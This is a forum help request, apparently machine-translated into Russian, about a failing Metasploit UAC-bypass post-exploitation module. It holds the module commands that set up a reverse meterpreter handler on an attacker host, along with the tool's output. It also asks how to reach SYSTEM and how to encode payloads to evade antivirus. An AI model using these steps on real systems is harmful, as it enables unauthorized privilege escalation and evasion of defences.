post/windows/escalate/bypassuac, похоже, не работает для меня
По какой-то причине я не могу заставить работать обходной модуль постэксплуатации. Вот что я сделал:
- Открыл сеанс meterpreter на целевой машине (как пользователь NETWORKSERVICE)
- Поместить сеанс в фоновый режим
Пытался использовать модуль постэксплуатации следующим образом:
использовать post/windows/escalate/bypassuac установить SESSION 1 установить LHOST 192.168.1.100 установить LPORT 4444 эксплойт
Порт еще не используется, так что все в порядке.
Результат выглядит следующим образом:
[-] Обработчику не удалось привязаться к 192.168.1.100:4444 [] Запущен обратный обработчик на 0.0.0.0:4444 [] Запуск обработчика полезной нагрузки... [] Загрузка исполняемого файла обхода UAC в файловую систему... [] Загружается исполняемый файл Meterpreter stager длиной 73802 байта.. [] Агент загружен в файловую систему.... [] Выполнение модуля Post завершено
Затем он возвращается в консоль и ничего не делает, никакого нового сеанса, вообще ничего.
Я проверил следующие вещи:
- Загрузка исполняемого файла bypassuac-x86.exe вручную в цель. Это сработало отлично.
- Проверил, не звенят ли тревожные звоночки вирусного сканера от исполняемого файла. Они не
Есть ли способ вручную запустить исполняемый файл, и может ли кто-нибудь объяснить мне, как это будет работать, чтобы открыть новый сеанс meterpreter с доступом на уровне SYSTEM?
Или я могу как-то закодировать полезную нагрузку и использовать свой собственный шаблон, чтобы обойти все возможности антивируса? Я еще не нашел возможности кодировать модули после эксплуатации.
заранее спасибо
Халвар
